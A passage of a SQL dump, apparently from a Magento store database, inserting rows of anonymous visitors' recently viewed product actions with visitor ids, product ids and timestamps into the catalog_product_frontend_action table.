(3722, 'recently_viewed_product', 3512, NULL, 2053, 1756827097),
(3723, 'recently_viewed_product', 3513, NULL, 2061, 1756850252),
(3724, 'recently_viewed_product', 3515, NULL, 2060, 1756925828),
(3725, 'recently_viewed_product', 3516, NULL, 2061, 1756926878),
(3726, 'recently_viewed_product', 3517, NULL, 2060, 1756935032),
(3730, 'recently_viewed_product', 3522, NULL, 2060, 1757040959),
(3731, 'recently_viewed_product', 3523, NULL, 2061, 1757063592),
(3733, 'recently_viewed_product', 3525, NULL, 2060, 1757123614),
(3734, 'recently_viewed_product', 3526, NULL, 2054, 1757127872),
(3736, 'recently_viewed_product', 3528, NULL, 2061, 1757146596),
(3737, 'recently_viewed_product', 3529, NULL, 2060, 1757169685),
(3739, 'recently_viewed_product', 3531, NULL, 2060, 1757197103),
(3740, 'recently_viewed_product', 3532, NULL, 2061, 1757116800),
(3743, 'recently_viewed_product', 3535, NULL, 2060, 1757219744),
(3745, 'recently_viewed_product', 3539, NULL, 2061, 1757245042),
(3747, 'recently_viewed_product', 3542, NULL, 2061, 1757274185),
(3748, 'recently_viewed_product', 3543, NULL, 2060, 1757274341),
(3750, 'recently_viewed_product', 3545, NULL, 2058, 1757203200),
(3751, 'recently_viewed_product', 3547, NULL, 2061, 1757319329),
(3752, 'recently_viewed_product', 3548, NULL, 2061, 1757334834),
(3753, 'recently_viewed_product', 3549, NULL, 2060, 1757340211),
(3754, 'recently_viewed_product', 3550, NULL, 2060, 1757342049),
(3757, 'recently_viewed_product', 3553, NULL, 2060, 1757414596),
(3758, 'recently_viewed_product', 3554, NULL, 2060, 1757415691),
(3759, 'recently_viewed_product', 3555, NULL, 2061, 1757429833),
(3760, 'recently_viewed_product', 3556, NULL, 2060, 1757447242),
(3762, 'recently_viewed_product', 3558, NULL, 2061, 1757496218),
(3763, 'recently_viewed_product', 3559, NULL, 2061, 1757504534),
(3765, 'recently_viewed_product', 3561, NULL, 2060, 1757548702),
(3767, 'recently_viewed_product', 3563, NULL, 2060, 1757603413),
(3768, 'recently_viewed_product', 3564, NULL, 2061, 1757603822),
(3769, 'recently_viewed_product', 3565, NULL, 2061, 1757548800),
(3771, 'recently_viewed_product', 3567, NULL, 2060, 1757659247),
(3772, 'recently_viewed_product', 3568, NULL, 2060, 1757662061),
(3773, 'recently_viewed_product', 3569, NULL, 2061, 1757663410),
(3775, 'recently_viewed_product', 3571, NULL, 2062, 1757635200),
(3777, 'recently_viewed_product', 3573, NULL, 2061, 1757695886),
(3778, 'recently_viewed_product', 3574, NULL, 2060, 1757696337),
(3779, 'recently_viewed_product', 3575, NULL, 2059, 1757635200),
(3781, 'recently_viewed_product', 3577, NULL, 2060, 1757723921),
(3782, 'recently_viewed_product', 3578, NULL, 2061, 1757761146),
(3783, 'recently_viewed_product', 3579, NULL, 2061, 1757772772),
(3784, 'recently_viewed_product', 3580, NULL, 2054, 1757721600),
(3785, 'recently_viewed_product', 3581, NULL, 2060, 1757785702),
(3787, 'recently_viewed_product', 3583, NULL, 2060, 1757824907),
(3788, 'recently_viewed_product', 3584, NULL, 2061, 1757834922),
(3789, 'recently_viewed_product', 3585, NULL, 2055, 1757808000),
(3792, 'recently_viewed_product', 3588, NULL, 2054, 1757808000),
(3794, 'recently_viewed_product', 3590, NULL, 2061, 1757883470),
(3795, 'recently_viewed_product', 3591, NULL, 2060, 1757883483),
(3797, 'recently_viewed_product', 3593, NULL, 2060, 1757888181),
(3798, 'recently_viewed_product', 3594, NULL, 2059, 1757894400),
(3800, 'recently_viewed_product', 3595, NULL, 2062, 1757907697),
(3801, 'recently_viewed_product', 3596, NULL, 2061, 1757916371),
(3802, 'recently_viewed_product', 3597, NULL, 2060, 1757916556),
(3803, 'recently_viewed_product', 3598, NULL, 2061, 1757894400),
(3804, 'recently_viewed_product', 3599, NULL, 2061, 1757939387),
(3807, 'recently_viewed_product', 3602, NULL, 2061, 1757970886),
(3808, 'recently_viewed_product', 3609, NULL, 2060, 1757980800),
(3809, 'recently_viewed_product', 3610, NULL, 2058, 1757980800),
(3810, 'recently_viewed_product', 3611, NULL, 2060, 1758005703),
(3811, 'recently_viewed_product', 3612, NULL, 2054, 1757980800),
(3812, 'recently_viewed_product', 3613, NULL, 2060, 1758035257),
(3814, 'recently_viewed_product', 3615, NULL, 2061, 1758044816),
(3815, 'recently_viewed_product', 3616, NULL, 2060, 1758045090),
(3817, 'recently_viewed_product', 3617, NULL, 2061, 1758059668),
(3818, 'recently_viewed_product', 3618, NULL, 2061, 1758069453),
(3819, 'recently_viewed_product', 3619, NULL, 2061, 1758069601),
(3821, 'recently_viewed_product', 3621, NULL, 2061, 1758086857),
(3823, 'recently_viewed_product', 3623, NULL, 2060, 1758100483),
(3825, 'recently_viewed_product', 3625, NULL, 2060, 1758124367),
(3826, 'recently_viewed_product', 3626, NULL, 2054, 1758067200),
(3827, 'recently_viewed_product', 3627, NULL, 2062, 1758141702),
(3828, 'recently_viewed_product', 3628, NULL, 2059, 1758067200),
(3830, 'recently_viewed_product', 3630, NULL, 2060, 1758182811),
(3833, 'recently_viewed_product', 3633, NULL, 2061, 1758196586),
(3834, 'recently_viewed_product', 3634, NULL, 2061, 1758153600),
(3836, 'recently_viewed_product', 3637, NULL, 2061, 1758274402),
(3837, 'recently_viewed_product', 3638, NULL, 2061, 1758281085),
(3839, 'recently_viewed_product', 3640, NULL, 2060, 1758313951),
(3841, 'recently_viewed_product', 3648, NULL, 2061, 1758354286),
(3842, 'recently_viewed_product', 3649, NULL, 2060, 1758355742),
(3844, 'recently_viewed_product', 3651, NULL, 2061, 1758412211),
(3845, 'recently_viewed_product', 3652, NULL, 2060, 1758415402),
(3847, 'recently_viewed_product', 3654, NULL, 2060, 1758437719),
(3849, 'recently_viewed_product', 3656, NULL, 2061, 1758488663),
(3850, 'recently_viewed_product', 3657, NULL, 2061, 1758493125),
(3851, 'recently_viewed_product', 3658, NULL, 2060, 1758493377),
(3852, 'recently_viewed_product', 3659, NULL, 2061, 1758495421),
(3853, 'recently_viewed_product', 3660, NULL, 2060, 1758511126),
(3854, 'recently_viewed_product', 3661, NULL, 2054, 1758529032),
(3857, 'recently_viewed_product', 3664, NULL, 2060, 1758563998),
(3858, 'recently_viewed_product', 3665, NULL, 2059, 1758499200),
(3859, 'recently_viewed_product', 3666, NULL, 2060, 1758592302),
(3860, 'recently_viewed_product', 3667, NULL, 2061, 1758597199),
(3865, 'recently_viewed_product', 3683, NULL, 2061, 1758674123),
(3866, 'recently_viewed_product', 3684, NULL, 2060, 1758678004),
(3868, 'recently_viewed_product', 3686, NULL, 2061, 1758688921),
(3870, 'recently_viewed_product', 3688, NULL, 2061, 1758782577),
(3871, 'recently_viewed_product', 3689, NULL, 2055, 1758758400),
(3872, 'recently_viewed_product', 3690, NULL, 2060, 1758788581),
(3873, 'recently_viewed_product', 3691, NULL, 2061, 1758791431),
(3874, 'recently_viewed_product', 3693, NULL, 2061, 1758844715),
(3877, 'recently_viewed_product', 3696, NULL, 2061, 1758888049),
(3879, 'recently_viewed_product', 3698, NULL, 2060, 1758893433),
(3880, 'recently_viewed_product', 3699, NULL, 2060, 1758894971),
(3881, 'recently_viewed_product', 3700, NULL, 2061, 1758921465),
(3882, 'recently_viewed_product', 3701, NULL, 2058, 1758927827),
(3886, 'recently_viewed_product', 3705, NULL, 2060, 1758983343),
(3887, 'recently_viewed_product', 3706, NULL, 2054, 1759009795),
(3888, 'recently_viewed_product', 3707, NULL, 2060, 1759037206),
(3889, 'recently_viewed_product', 3708, NULL, 2060, 1759017600),
(3890, 'recently_viewed_product', 3709, NULL, 2059, 1759017600),
(3891, 'recently_viewed_product', 3710, NULL, 2060, 1759055626),
(3901, 'recently_viewed_product', 3715, NULL, 2054, 1759104000),
(3903, 'recently_viewed_product', 3717, NULL, 2061, 1759137644),
(3904, 'recently_viewed_product', 3718, NULL, 2060, 1759140141),
(3905, 'recently_viewed_product', 3719, NULL, 2061, 1759147083),
(3906, 'recently_viewed_product', 3720, NULL, 2060, 1759156592),
(3907, 'recently_viewed_product', 3721, NULL, 2058, 1759104000),
(3909, 'recently_viewed_product', 3723, NULL, 2060, 1759104000),
(3910, 'recently_viewed_product', 3724, NULL, 2060, 1759172991),
(3911, 'recently_viewed_product', 3725, NULL, 2061, 1759104000),
(3914, 'recently_viewed_product', 3728, NULL, 2061, 1759224677),
(3916, 'recently_viewed_product', 3730, NULL, 2060, 1759233943),
(3917, 'recently_viewed_product', 3731, NULL, 2061, 1759234112),
(3918, 'recently_viewed_product', 3732, NULL, 2060, 1759234719),
(3920, 'recently_viewed_product', 3734, NULL, 2061, 1759190400),
(3921, 'recently_viewed_product', 3735, NULL, 2061, 1759298226),
(3922, 'recently_viewed_product', 3736, NULL, 2061, 1759340015),
(3924, 'recently_viewed_product', 3738, NULL, 2060, 1759355684),
(3925, 'recently_viewed_product', 3739, NULL, 2060, 1759412121),
(3926, 'recently_viewed_product', 3740, NULL, 2061, 1759426959),
(3928, 'recently_viewed_product', 3742, NULL, 2054, 1759481366),
(3929, 'recently_viewed_product', 3743, NULL, 2054, 1759488007),
(3931, 'recently_viewed_product', 3745, NULL, 2060, 1759513266),
(3932, 'recently_viewed_product', 3746, NULL, 2060, 1759546301),
(3933, 'recently_viewed_product', 3747, NULL, 2054, 1759554290),
(3934, 'recently_viewed_product', 3748, NULL, 2054, 1759558951),
(3935, 'recently_viewed_product', 3749, NULL, 2060, 1759637515),
(3937, 'recently_viewed_product', 3751, NULL, 2054, 1759653942),
(3938, 'recently_viewed_product', 3752, NULL, 2060, 1759657000),
(3939, 'recently_viewed_product', 3753, NULL, 2062, 1759663197),
(3940, 'recently_viewed_product', 3754, NULL, 2054, 1759663584),
(3941, 'recently_viewed_product', 3755, NULL, 2062, 1759683561),
(3942, 'recently_viewed_product', 3756, NULL, 2060, 1759740867),
(3943, 'recently_viewed_product', 3757, NULL, 2060, 1759772814),
(3947, 'recently_viewed_product', 3762, NULL, 2060, 1759818573),
(3949, 'recently_viewed_product', 3764, NULL, 2060, 1759922189),
(3952, 'recently_viewed_product', 3767, NULL, 2060, 1759938496),
(3954, 'recently_viewed_product', 3769, NULL, 2054, 1759999710),
(3957, 'recently_viewed_product', 3772, NULL, 2060, 1760048651),
(3958, 'recently_viewed_product', 3773, NULL, 2061, 1759968000),
(3959, 'recently_viewed_product', 3774, NULL, 2062, 1760061563),
(3961, 'recently_viewed_product', 3776, NULL, 2054, 1760068206),
(3962, 'recently_viewed_product', 3777, NULL, 2054, 1760069905),
(3963, 'recently_viewed_product', 3778, NULL, 2060, 1760071648),
(3964, 'recently_viewed_product', 3779, NULL, 2060, 1760123411),
(3965, 'recently_viewed_product', 3780, NULL, 2054, 1760131197),
(3966, 'recently_viewed_product', 3781, NULL, 2054, 1760134879),
(3967, 'recently_viewed_product', 3782, NULL, 2060, 1760175294),
(3968, 'recently_viewed_product', 3783, NULL, 2060, 1760203780),
(3971, 'recently_viewed_product', 3786, NULL, 2060, 1760265130),
(3972, 'recently_viewed_product', 3787, NULL, 2054, 1760265855),
(3974, 'recently_viewed_product', 3789, NULL, 2060, 1760279666),
(3976, 'recently_viewed_product', 3791, NULL, 2061, 1760332852),
(3978, 'recently_viewed_product', 3793, NULL, 2054, 1760352040),
(3979, 'recently_viewed_product', 3794, NULL, 2060, 1760380954),
(3980, 'recently_viewed_product', 3795, NULL, 2060, 1760431074),
(3982, 'recently_viewed_product', 3797, NULL, 2054, 1760482822),
(3983, 'recently_viewed_product', 3798, NULL, 2060, 1760499792),
(3986, 'recently_viewed_product', 3801, NULL, 2060, 1760572434),
(3988, 'recently_viewed_product', 3803, NULL, 2060, 1760590237),
(3991, 'recently_viewed_product', 3806, NULL, 2060, 1760604101),
(3992, 'recently_viewed_product', 3807, NULL, 2062, 1760604720),
(3997, 'recently_viewed_product', 3812, NULL, 2055, 1760572800),
(3998, 'recently_viewed_product', 3813, NULL, 2060, 1760677357),
(4002, 'recently_viewed_product', 3816, NULL, 2061, 1760713626),
(4003, 'recently_viewed_product', 3817, NULL, 2060, 1760714109),
(4005, 'recently_viewed_product', 3819, NULL, 2062, 1760718605),
(4006, 'recently_viewed_product', 3820, NULL, 2059, 1760718754),
(4009, 'recently_viewed_product', 3823, NULL, 2060, 1760776830),
(4010, 'recently_viewed_product', 3824, NULL, 2058, 1760785606),
(4012, 'recently_viewed_product', 3826, NULL, 2054, 1760801496),
(4013, 'recently_viewed_product', 3827, NULL, 2061, 1760803587),
(4015, 'recently_viewed_product', 3829, NULL, 2062, 1760808611),
(4016, 'recently_viewed_product', 3830, NULL, 2059, 1760809510),
(4017, 'recently_viewed_product', 3831, NULL, 2060, 1760810153),
(4019, 'recently_viewed_product', 3833, NULL, 2060, 1760840570),
(4020, 'recently_viewed_product', 3834, NULL, 2059, 1760745600),
(4022, 'recently_viewed_product', 3836, NULL, 2054, 1760864702),
(4023, 'recently_viewed_product', 3837, NULL, 2061, 1760867555),
(4026, 'recently_viewed_product', 3840, NULL, 2060, 1760883645),
(4030, 'recently_viewed_product', 3845, NULL, 2060, 1760942612),
(4031, 'recently_viewed_product', 3846, NULL, 2060, 1760943899),
(4032, 'recently_viewed_product', 3847, NULL, 2058, 1760952345),
(4033, 'recently_viewed_product', 3848, NULL, 2055, 1760958920),
(4035, 'recently_viewed_product', 3850, NULL, 2061, 1760972502),
(4038, 'recently_viewed_product', 3853, NULL, 2062, 1760977735),
(4042, 'recently_viewed_product', 3858, NULL, 2060, 1761014385),
(4043, 'recently_viewed_product', 3859, NULL, 2054, 1761017045),
(4045, 'recently_viewed_product', 3861, NULL, 2058, 1761034416),
(4046, 'recently_viewed_product', 3862, NULL, 2055, 1761004800),
(4048, 'recently_viewed_product', 3864, NULL, 2061, 1761052615),
(4049, 'recently_viewed_product', 3865, NULL, 2054, 1761055595),
(4050, 'recently_viewed_product', 3866, NULL, 2062, 1761057509),
(4051, 'recently_viewed_product', 3867, NULL, 2054, 1761061357),
(4054, 'recently_viewed_product', 3870, NULL, 2060, 1761072542),
(4055, 'recently_viewed_product', 3871, NULL, 2060, 1761082251),
(4056, 'recently_viewed_product', 3872, NULL, 2058, 1761091368),
(4057, 'recently_viewed_product', 3873, NULL, 2060, 1761098421),
(4059, 'recently_viewed_product', 3875, NULL, 2061, 1761108855);
INSERT INTO `catalog_product_frontend_action` (`action_id`, `type_id`, `visitor_id`, `customer_id`, `product_id`, `added_at`) VALUES
(4060, 'recently_viewed_product', 3876, NULL, 2061, 1761091200),
(4061, 'recently_viewed_product', 3877, NULL, 2059, 1761114208),
(4062, 'recently_viewed_product', 3879, NULL, 2062, 1761116168),
(4064, 'recently_viewed_product', 3881, NULL, 2054, 1761126801),
(4065, 'recently_viewed_product', 3882, NULL, 2060, 1761132173),
(4066, 'recently_viewed_product', 3883, NULL, 2054, 1761140460),
(4068, 'recently_viewed_product', 3885, NULL, 2054, 1761168776),
(4069, 'recently_viewed_product', 3886, NULL, 2060, 1761169937),
(4070, 'recently_viewed_product', 3887, NULL, 2058, 1761175699),
(4072, 'recently_viewed_product', 3889, NULL, 2055, 1761184597),
(4073, 'recently_viewed_product', 3890, NULL, 2062, 1761177600),
(4074, 'recently_viewed_product', 3891, NULL, 2054, 1761196091),
(4075, 'recently_viewed_product', 3892, NULL, 2060, 1761197311),
(4078, 'recently_viewed_product', 3895, NULL, 2054, 1761209183),
(4080, 'recently_viewed_product', 3897, NULL, 2054, 1761230293),
(4081, 'recently_viewed_product', 3898, NULL, 2060, 1761233284),
(4083, 'recently_viewed_product', 3900, NULL, 2058, 1761264135),
(4084, 'recently_viewed_product', 3901, NULL, 2055, 1761270037),
(4086, 'recently_viewed_product', 3903, NULL, 2054, 1761282342),
(4087, 'recently_viewed_product', 3904, NULL, 2054, 1761283206),
(4089, 'recently_viewed_product', 3905, NULL, 2062, 1761287323),
(4091, 'recently_viewed_product', 3907, NULL, 2060, 1761305521),
(4092, 'recently_viewed_product', 3908, NULL, 2054, 1761307079),
(4094, 'recently_viewed_product', 3911, NULL, 2060, 1761348604),
(4095, 'recently_viewed_product', 3912, NULL, 2058, 1761350588),
(4096, 'recently_viewed_product', 3913, NULL, 2055, 1761356149),
(4099, 'recently_viewed_product', 3916, NULL, 2054, 1761373848),
(4100, 'recently_viewed_product', 3917, NULL, 2060, 1761375226),
(4102, 'recently_viewed_product', 3919, NULL, 2060, 1761384539),
(4105, 'recently_viewed_product', 3922, NULL, 2054, 1761405743),
(4107, 'recently_viewed_product', 3924, NULL, 2054, 1761428400),
(4108, 'recently_viewed_product', 3925, NULL, 2060, 1761430330),
(4109, 'recently_viewed_product', 3926, NULL, 2058, 1761439336),
(4110, 'recently_viewed_product', 3927, NULL, 2060, 1761442399),
(4112, 'recently_viewed_product', 3929, NULL, 2059, 1761436800),
(4113, 'recently_viewed_product', 3930, NULL, 2061, 1761454242),
(4117, 'recently_viewed_product', 3932, NULL, 2060, 1761469283),
(4119, 'recently_viewed_product', 3934, NULL, 2054, 1761473952),
(4120, 'recently_viewed_product', 3935, NULL, 2060, 1761496741),
(4121, 'recently_viewed_product', 3936, NULL, 2054, 1761503283),
(4122, 'recently_viewed_product', 3937, NULL, 2054, 1761509925),
(4123, 'recently_viewed_product', 3938, NULL, 2058, 1761523815),
(4124, 'recently_viewed_product', 3939, NULL, 2055, 1761529229),
(4126, 'recently_viewed_product', 3941, NULL, 2060, 1761545691),
(4127, 'recently_viewed_product', 3942, NULL, 2054, 1761550511),
(4129, 'recently_viewed_product', 3945, NULL, 2054, 1761574384),
(4133, 'recently_viewed_product', 3951, NULL, 2060, 1761607009),
(4134, 'recently_viewed_product', 3952, NULL, 2058, 1761609699),
(4135, 'recently_viewed_product', 3953, NULL, 2055, 1761615850),
(4137, 'recently_viewed_product', 3955, NULL, 2054, 1761619569),
(4138, 'recently_viewed_product', 3956, NULL, 2060, 1761623903),
(4139, 'recently_viewed_product', 3957, NULL, 2061, 1761627138),
(4140, 'recently_viewed_product', 3958, NULL, 2054, 1761628033),
(4141, 'recently_viewed_product', 3959, NULL, 2054, 1761628834),
(4142, 'recently_viewed_product', 3961, NULL, 2054, 1761682072),
(4143, 'recently_viewed_product', 3963, NULL, 2062, 1761609600),
(4144, 'recently_viewed_product', 3964, NULL, 2054, 1761698614),
(4145, 'recently_viewed_product', 3965, NULL, 2054, 1761703645),
(4147, 'recently_viewed_product', 3984, NULL, 2054, 1761725275),
(4148, 'recently_viewed_product', 4008, NULL, 2062, 1761768433),
(4149, 'recently_viewed_product', 4010, NULL, 2060, 1761776130),
(4150, 'recently_viewed_product', 4014, NULL, 2055, 1761782400),
(4151, 'recently_viewed_product', 4015, NULL, 2054, 1761802442),
(4152, 'recently_viewed_product', 4016, NULL, 2060, 1761802479),
(4153, 'recently_viewed_product', 4017, NULL, 2054, 1761803475),
(4154, 'recently_viewed_product', 4022, NULL, 2054, 1761825079),
(4156, 'recently_viewed_product', 4029, NULL, 2054, 1761855402),
(4157, 'recently_viewed_product', 4031, NULL, 2060, 1761865312),
(4158, 'recently_viewed_product', 4035, NULL, 2060, 1761898217),
(4160, 'recently_viewed_product', 4041, NULL, 2054, 1761938793),
(4161, 'recently_viewed_product', 4044, NULL, 2054, 1761940503),
(4163, 'recently_viewed_product', 4050, NULL, 2060, 1761960952),
(4165, 'recently_viewed_product', 4061, NULL, 2054, 1761999536),
(4170, 'recently_viewed_product', 4067, NULL, 2060, 1762011612),
(4172, 'recently_viewed_product', 4071, NULL, 2054, 1762036463),
(4174, 'recently_viewed_product', 4078, NULL, 2062, 1762074485),
(4176, 'recently_viewed_product', 4081, NULL, 2060, 1762091648),
(4178, 'recently_viewed_product', 4084, NULL, 2054, 1762107033),
(4179, 'recently_viewed_product', 4095, NULL, 2060, 1762159387),
(4180, 'recently_viewed_product', 4096, NULL, 2054, 1762160204),
(4182, 'recently_viewed_product', 4114, NULL, 2054, 1762229106),
(4184, 'recently_viewed_product', 4129, NULL, 2062, 1762279206),
(4185, 'recently_viewed_product', 4130, NULL, 2054, 1762281362),
(4186, 'recently_viewed_product', 4143, NULL, 2054, 1762335313),
(4187, 'recently_viewed_product', 4147, NULL, 2060, 1762343542),
(4189, 'recently_viewed_product', 4153, NULL, 2054, 1762373828),
(4191, 'recently_viewed_product', 4157, NULL, 2060, 1762382544),
(4193, 'recently_viewed_product', 4177, NULL, 2060, 1762471451),
(4194, 'recently_viewed_product', 4182, NULL, 2060, 1762494055),
(4196, 'recently_viewed_product', 4192, NULL, 2054, 1762537768),
(4197, 'recently_viewed_product', 4197, NULL, 2054, 1762553173),
(4198, 'recently_viewed_product', 4198, NULL, 2060, 1762553341),
(4201, 'recently_viewed_product', 4209, NULL, 2054, 1762598874),
(4203, 'recently_viewed_product', 4220, NULL, 2054, 1762642055),
(4204, 'recently_viewed_product', 4221, NULL, 2060, 1762643069),
(4206, 'recently_viewed_product', 4223, NULL, 2054, 1762644820),
(4210, 'recently_viewed_product', 4235, NULL, 2055, 1762687537),
(4211, 'recently_viewed_product', 4236, NULL, 2058, 1762688506),
(4212, 'recently_viewed_product', 4238, NULL, 2054, 1762692734),
(4213, 'recently_viewed_product', 4239, NULL, 2054, 1762694014),
(4214, 'recently_viewed_product', 4241, NULL, 2055, 1762646400),
(4215, 'recently_viewed_product', 4242, NULL, 2054, 1762715279),
(4216, 'recently_viewed_product', 4243, NULL, 2054, 1762716338),
(4217, 'recently_viewed_product', 4248, NULL, 2060, 1762727649),
(4218, 'recently_viewed_product', 4249, NULL, 2054, 1762646400),
(4219, 'recently_viewed_product', 4252, NULL, 2061, 1762646400),
(4220, 'recently_viewed_product', 4256, NULL, 2055, 1762732800),
(4224, 'recently_viewed_product', 4261, NULL, 2054, 1762732800),
(4225, 'recently_viewed_product', 4270, NULL, 2059, 1762786459),
(4226, 'recently_viewed_product', 4271, NULL, 2055, 1762787684),
(4227, 'recently_viewed_product', 4272, NULL, 2055, 1762732800),
(4228, 'recently_viewed_product', 4274, NULL, 2060, 1762799143),
(4230, 'recently_viewed_product', 4276, NULL, 2054, 1762800956),
(4231, 'recently_viewed_product', 4278, NULL, 2060, 1762802946),
(4232, 'recently_viewed_product', 4279, NULL, 2054, 1762732800),
(4233, 'recently_viewed_product', 4281, NULL, 2062, 1762808911),
(4234, 'recently_viewed_product', 4291, NULL, 2058, 1762834045),
(4236, 'recently_viewed_product', 4297, NULL, 2054, 1762819200),
(4237, 'recently_viewed_product', 4303, NULL, 2058, 1762819200),
(4239, 'recently_viewed_product', 4309, NULL, 2058, 1762890051),
(4240, 'recently_viewed_product', 4318, NULL, 2058, 1762905600),
(4242, 'recently_viewed_product', 4323, NULL, 2054, 1762905600),
(4243, 'recently_viewed_product', 4324, NULL, 2054, 1762905600),
(4244, 'recently_viewed_product', 4326, NULL, 2054, 1762927649),
(4248, 'recently_viewed_product', 4335, NULL, 2055, 1762905600),
(4249, 'recently_viewed_product', 4337, NULL, 2059, 1762905600),
(4250, 'recently_viewed_product', 4338, NULL, 2061, 1762905600),
(4251, 'recently_viewed_product', 4339, NULL, 2062, 1762905600),
(4253, 'recently_viewed_product', 4344, NULL, 2054, 1762957754),
(4255, 'recently_viewed_product', 4362, NULL, 2060, 1762982012),
(4259, 'recently_viewed_product', 4371, NULL, 2062, 1763000545),
(4261, 'recently_viewed_product', 4389, NULL, 2054, 1763060245),
(4263, 'recently_viewed_product', 4409, NULL, 2059, 1763078400),
(4268, 'recently_viewed_product', 4416, NULL, 2054, 1763128797),
(4270, 'recently_viewed_product', 4429, NULL, 2062, 1763160849),
(4271, 'recently_viewed_product', 4431, NULL, 2054, 1763165587),
(4272, 'recently_viewed_product', 4434, NULL, 2060, 1763166316),
(4274, 'recently_viewed_product', 4444, NULL, 2060, 1763190081),
(4275, 'recently_viewed_product', 4448, NULL, 2054, 1763202059),
(4278, 'recently_viewed_product', 4457, NULL, 2060, 1763164800),
(4280, 'recently_viewed_product', 4466, NULL, 2054, 1763232304),
(4282, 'recently_viewed_product', 4482, NULL, 2060, 1763270693),
(4284, 'recently_viewed_product', 4502, NULL, 2055, 1763344140),
(4287, 'recently_viewed_product', 4524, NULL, 2054, 1763411006),
(4294, 'recently_viewed_product', 4558, NULL, 2054, 1763424000),
(4295, 'recently_viewed_product', 4560, NULL, 2062, 1763495227),
(4296, 'recently_viewed_product', 4566, NULL, 2058, 1763517869),
(4297, 'recently_viewed_product', 4567, NULL, 2058, 1763517870),
(4298, 'recently_viewed_product', 4568, NULL, 2058, 1763517870),
(4299, 'recently_viewed_product', 4569, NULL, 2058, 1763521468),
(4300, 'recently_viewed_product', 4570, NULL, 2058, 1763521597),
(4301, 'recently_viewed_product', 4571, NULL, 2058, 1763521778),
(4302, 'recently_viewed_product', 4585, NULL, 2058, 1763553761),
(4303, 'recently_viewed_product', 4586, NULL, 2054, 1763556469),
(4304, 'recently_viewed_product', 4592, NULL, 2054, 1763578140),
(4306, 'recently_viewed_product', 4600, NULL, 2060, 1763613682),
(4307, 'recently_viewed_product', 4602, NULL, 2061, 1763596800),
(4308, 'recently_viewed_product', 4606, NULL, 2060, 1763635245),
(4309, 'recently_viewed_product', 4610, NULL, 2062, 1763647215),
(4313, 'recently_viewed_product', 4636, NULL, 2054, 1763748610),
(4314, 'recently_viewed_product', 4639, NULL, 2060, 1763757172),
(4315, 'recently_viewed_product', 4644, NULL, 2055, 1763769600),
(4316, 'recently_viewed_product', 4648, NULL, 2054, 1763800069),
(4317, 'recently_viewed_product', 4659, NULL, 2058, 1763769600),
(4319, 'recently_viewed_product', 4673, NULL, 2054, 1763880893),
(4320, 'recently_viewed_product', 4676, NULL, 2054, 1763856000),
(4321, 'recently_viewed_product', 4723, NULL, 2059, 1764028800),
(4322, 'recently_viewed_product', 4728, NULL, 2060, 1764068710),
(4325, 'recently_viewed_product', 4741, NULL, 2060, 1764114284),
(4326, 'recently_viewed_product', 4744, NULL, 2054, 1764119812),
(4327, 'recently_viewed_product', 4746, NULL, 2060, 1764128865),
(4329, 'recently_viewed_product', 4752, NULL, 2061, 1764115200),
(4330, 'recently_viewed_product', 4759, NULL, 2054, 1764172077),
(4331, 'recently_viewed_product', 4761, NULL, 2054, 1764173197),
(4332, 'recently_viewed_product', 4773, NULL, 2054, 1764219889),
(4333, 'recently_viewed_product', 4777, NULL, 2054, 1764232535),
(4334, 'recently_viewed_product', 4780, NULL, 2058, 1764240345),
(4335, 'recently_viewed_product', 4781, NULL, 2058, 1764240356),
(4338, 'recently_viewed_product', 4792, NULL, 2054, 1764270585),
(4339, 'recently_viewed_product', 4795, NULL, 2060, 1764279151),
(4340, 'recently_viewed_product', 4808, NULL, 2060, 1764310584),
(4343, 'recently_viewed_product', 4813, NULL, 2060, 1764322594),
(4344, 'recently_viewed_product', 4815, NULL, 2054, 1764326974),
(4346, 'recently_viewed_product', 4826, NULL, 2054, 1764361776),
(4347, 'recently_viewed_product', 4829, NULL, 2054, 1764381824),
(4348, 'recently_viewed_product', 4831, NULL, 2060, 1764384748),
(4349, 'recently_viewed_product', 4839, NULL, 2060, 1764418044),
(4351, 'recently_viewed_product', 4860, NULL, 2060, 1764489736),
(4352, 'recently_viewed_product', 4865, NULL, 2060, 1764509888),
(4353, 'recently_viewed_product', 4883, NULL, 2058, 1764547200),
(4355, 'recently_viewed_product', 4886, NULL, 2054, 1764569268),
(4356, 'recently_viewed_product', 4889, NULL, 2060, 1764575632),
(4358, 'recently_viewed_product', 4902, NULL, 2054, 1764619471),
(4360, 'recently_viewed_product', 4905, NULL, 2060, 1764626392),
(4362, 'recently_viewed_product', 4918, NULL, 2060, 1764669086),
(4363, 'recently_viewed_product', 4925, NULL, 2054, 1764688440),
(4364, 'recently_viewed_product', 4933, NULL, 2061, 1764633600),
(4365, 'recently_viewed_product', 4934, NULL, 2060, 1764718936),
(4367, 'recently_viewed_product', 4943, NULL, 2054, 1764739801),
(4368, 'recently_viewed_product', 4951, NULL, 2060, 1764770212),
(4369, 'recently_viewed_product', 4954, NULL, 2054, 1764720000),
(4370, 'recently_viewed_product', 4958, NULL, 2060, 1764788013),
(4372, 'recently_viewed_product', 4964, NULL, 2061, 1764806400),
(4374, 'recently_viewed_product', 5029, NULL, 2054, 1764849514),
(4375, 'recently_viewed_product', 5031, NULL, 2054, 1764851908),
(4376, 'recently_viewed_product', 5033, NULL, 2059, 1764806400),
(4377, 'recently_viewed_product', 5035, NULL, 2055, 1764806400),
(4378, 'recently_viewed_product', 5040, NULL, 2054, 1764879215),
(4379, 'recently_viewed_product', 5043, NULL, 2054, 1764889974),
(4380, 'recently_viewed_product', 5047, NULL, 2060, 1764905425),
(4382, 'recently_viewed_product', 5053, NULL, 2060, 1764925478),
(4385, 'recently_viewed_product', 5059, NULL, 2054, 1764936272),
(4387, 'recently_viewed_product', 5068, NULL, 2054, 1764966769),
(4388, 'recently_viewed_product', 5069, NULL, 2060, 1764966762),
(4389, 'recently_viewed_product', 5072, NULL, 2060, 1764973121),
(4391, 'recently_viewed_product', 5075, NULL, 2054, 1764977836),
(4392, 'recently_viewed_product', 5076, NULL, 2054, 1764979034),
(4395, 'recently_viewed_product', 5088, NULL, 2060, 1765011461),
(4396, 'recently_viewed_product', 5090, NULL, 2054, 1765017035),
(4397, 'recently_viewed_product', 5092, NULL, 2060, 1765021879),
(4401, 'recently_viewed_product', 5099, NULL, 2054, 1765029289),
(4404, 'recently_viewed_product', 5106, NULL, 2060, 1765054564),
(4406, 'recently_viewed_product', 5114, NULL, 2060, 1765078019),
(4407, 'recently_viewed_product', 5117, NULL, 2054, 1765086660),
(4411, 'recently_viewed_product', 5129, NULL, 2060, 1765125504),
(4412, 'recently_viewed_product', 5134, NULL, 2054, 1765143470),
(4413, 'recently_viewed_product', 5136, NULL, 2054, 1765149959),
